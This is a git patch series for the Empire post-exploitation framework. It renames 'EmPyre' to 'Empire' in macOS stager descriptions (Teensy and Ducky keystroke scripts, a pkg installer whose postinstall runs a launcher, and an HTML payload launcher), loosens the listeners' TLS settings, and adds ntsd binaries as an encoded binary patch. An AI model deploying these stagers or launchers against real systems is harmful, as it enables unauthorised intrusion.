@@ class Stager: 'Author': ['@xorrior'], - 'Description': ('Generates an EmPyre Application.'), + 'Description': ('Generates an Empire Application.'), 'Comments': [ '' @@ -42,7 +42,7 @@ class Stager: 'Value' : '' }, 'OutFile' : { - 'Description' : 'path to output EmPyre application. The application will be saved to a zip file.', + 'Description' : 'path to output Empire application. The application will be saved to a zip file.', 'Required' : True, 'Value' : '/tmp/out.zip' }, diff --git a/lib/stagers/osx/ducky.py b/lib/stagers/osx/ducky.py index 883d534..f4873b2 100755 --- a/lib/stagers/osx/ducky.py +++ b/lib/stagers/osx/ducky.py @@ -9,7 +9,7 @@ class Stager: 'Author': ['@xorrior'], - 'Description': ('Generates a ducky script that runs a one-liner stage0 launcher for EmPyre.'), + 'Description': ('Generates a ducky script that runs a one-liner stage0 launcher for Empire.'), 'Comments': [ '' diff --git a/lib/stagers/osx/launcher.py b/lib/stagers/osx/launcher.py index aca7f95..4b09157 100644 --- a/lib/stagers/osx/launcher.py +++ b/lib/stagers/osx/launcher.py @@ -10,7 +10,7 @@ class Stager: 'Author': ['@harmj0y'], - 'Description': ('Generates a one-liner stage0 launcher for EmPyre.'), + 'Description': ('Generates a one-liner stage0 launcher for Empire.'), 'Comments': [ '' diff --git a/lib/stagers/osx/pkg.py b/lib/stagers/osx/pkg.py index 7a5a2d7..910dc81 100644 --- a/lib/stagers/osx/pkg.py +++ b/lib/stagers/osx/pkg.py @@ -9,7 +9,7 @@ class Stager: 'Author': ['@xorrior'], - 'Description': ('Generates a pkg installer. The installer will copy a custom (empty) application to the /Applications folder. The postinstall script will execute an EmPyre launcher.'), + 'Description': ('Generates a pkg installer. The installer will copy a custom (empty) application to the /Applications folder. The postinstall script will execute an Empire launcher.'), 'Comments': [ '' diff --git a/lib/stagers/osx/safari_launcher.py b/lib/stagers/osx/safari_launcher.py index 9f16b63..f9ee215 100644 --- a/lib/stagers/osx/safari_launcher.py +++ b/lib/stagers/osx/safari_launcher.py @@ -10,7 +10,7 @@ class Stager: 'Author': ['@424f424f'], - 'Description': ('Generates an HTML payload launcher for EmPyre.'), + 'Description': ('Generates an HTML payload launcher for Empire.'), 'Comments': [ 'https://www.exploit-db.com/exploits/38535/' @@ -98,4 +98,4 @@ class Stager: }; """ % (launcher) - return html \ No newline at end of file + return html diff --git a/lib/stagers/osx/teensy.py b/lib/stagers/osx/teensy.py index 924bfb7..cc8ae05 100644 --- a/lib/stagers/osx/teensy.py +++ b/lib/stagers/osx/teensy.py @@ -10,7 +10,7 @@ class Stager: 'Author': ['Matt @matterpreter Hand'], - 'Description': ('Generates a Teensy script that runs a one-liner stage0 launcher for EmPyre.'), + 'Description': ('Generates a Teensy script that runs a one-liner stage0 launcher for Empire.'), 'Comments': [ '' @@ -116,7 +116,7 @@ class Stager: teensyCode += " Keyboard.send_now();\n" teensyCode += " clearKeys();\n" teensyCode += "}\n\n" - teensyCode += "void empyre(void) {\n" + teensyCode += "void empire(void) {\n" teensyCode += " delay(500);\n" teensyCode += " mac_minWindows();\n" teensyCode += " mac_minWindows();\n" @@ -132,7 +132,7 @@ class Stager: teensyCode += " Keyboard.println(\"exit\");\n" teensyCode += "}\n\n" teensyCode += "void setup(void) {\n" - teensyCode += " empyre();\n" + teensyCode += " empire();\n" teensyCode += "}\n\n" teensyCode += "void loop() {}" From c814fc942b8a0f777841b9b57c00303ac8bb1c4f Mon Sep 17 00:00:00 2001 From: xorrior Date: Wed, 18 Oct 2017 08:22:21 -0400 Subject: [PATCH 23/50] Reverted back to support any version of TLS --- empire | 11 ++++++++++- lib/listeners/http.py | 12 +++++++++++- lib/listeners/http_com.py | 11 ++++++++++- lib/listeners/http_mapi.py | 11 ++++++++++- 4 files changed, 41 insertions(+), 4 deletions(-) diff --git a/empire b/empire index 0d7f49a..6206659 100755 --- a/empire +++ b/empire @@ -1227,7 +1227,16 @@ def start_restful_api(empireMenu, suppress=False, username=None, password=None, # wrap the Flask connection in SSL and start it certPath = os.path.abspath("./data/") - context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2) + + # support any version of tls + if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13: + proto = ssl.PROTOCOL_TLS + elif pyversion[0] >= 3: + proto = ssl.PROTOCOL_TLS + else: + proto = ssl.PROTOCOL_SSLv23 + + context = ssl.SSLContext(proto) context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath)) app.run(host='0.0.0.0', port=int(port), ssl_context=context, threaded=True) diff --git a/lib/listeners/http.py b/lib/listeners/http.py index c9bb555..ecde4f2 100644 --- a/lib/listeners/http.py +++ b/lib/listeners/http.py @@ -961,7 +961,17 @@ def send_message(packets=None): host = listenerOptions['Host']['Value'] if certPath.strip() != '' and host.startswith('https'): certPath = os.path.abspath(certPath) - context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2) + pyversion = sys.version_info + + # support any version of tls + if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13: + proto = ssl.PROTOCOL_TLS + elif pyversion[0] >= 3: + proto = ssl.PROTOCOL_TLS + else: + proto = ssl.PROTOCOL_SSLv23 + + context = ssl.SSLContext(proto) context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath)) app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context) else: diff --git a/lib/listeners/http_com.py b/lib/listeners/http_com.py index fe47b6e..459b2aa 100644 --- a/lib/listeners/http_com.py +++ b/lib/listeners/http_com.py @@ -630,7 +630,16 @@ class Listener: host = listenerOptions['Host']['Value'] if certPath.strip() != '' and host.startswith('https'): certPath = os.path.abspath(certPath) - context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2) + + # support any version of tls + if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13: + proto = ssl.PROTOCOL_TLS + elif pyversion[0] >= 3: + proto = ssl.PROTOCOL_TLS + else: + proto = ssl.PROTOCOL_SSLv23 + + context = ssl.SSLContext(proto) context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath)) app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context) else: diff --git a/lib/listeners/http_mapi.py b/lib/listeners/http_mapi.py index 1bedc03..41c8e73 100644 --- a/lib/listeners/http_mapi.py +++ b/lib/listeners/http_mapi.py @@ -616,7 +616,16 @@ class Listener: host = listenerOptions['Host']['Value'] if certPath.strip() != '' and host.startswith('https'): certPath = os.path.abspath(certPath) - context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2) + + # support any version of tls + if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13: + proto = ssl.PROTOCOL_TLS + elif pyversion[0] >= 3: + proto = ssl.PROTOCOL_TLS + else: + proto = ssl.PROTOCOL_SSLv23 + + context = ssl.SSLContext(proto) context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath)) app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context) else: From a645d461eff7e6bbf217573fabf7a582a5dec1cd Mon Sep 17 00:00:00 2001 From: root Date: Thu, 19 Oct 2017 11:10:39 -0400 Subject: [PATCH 24/50] changes to the invoke_ntsd module --- .../code_execution/{ntsd.exe => ntsd_x64.exe} | Bin .../module_source/code_execution/ntsd_x86.exe | Bin 0 -> 88008 bytes .../{ntsdexts.dll => ntsdexts_x64.dll} | Bin .../code_execution/ntsdexts_x86.dll | Bin 0 -> 81864 bytes lib/common/stagers.py | 16 +++ .../powershell/code_execution/invoke_ntsd.py | 126 ++++++++++-------- 6 files changed, 84 insertions(+), 58 deletions(-) rename data/module_source/code_execution/{ntsd.exe => ntsd_x64.exe} (100%) create mode 100644 data/module_source/code_execution/ntsd_x86.exe rename data/module_source/code_execution/{ntsdexts.dll => ntsdexts_x64.dll} (100%) create mode 100644 data/module_source/code_execution/ntsdexts_x86.dll diff --git a/data/module_source/code_execution/ntsd.exe b/data/module_source/code_execution/ntsd_x64.exe similarity index 100% rename from data/module_source/code_execution/ntsd.exe rename to data/module_source/code_execution/ntsd_x64.exe diff --git a/data/module_source/code_execution/ntsd_x86.exe b/data/module_source/code_execution/ntsd_x86.exe new file mode 100644 index 0000000000000000000000000000000000000000..321772f947e83ec9342c5dbdfeaed9937ff84191 GIT binary patch literal 88008 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 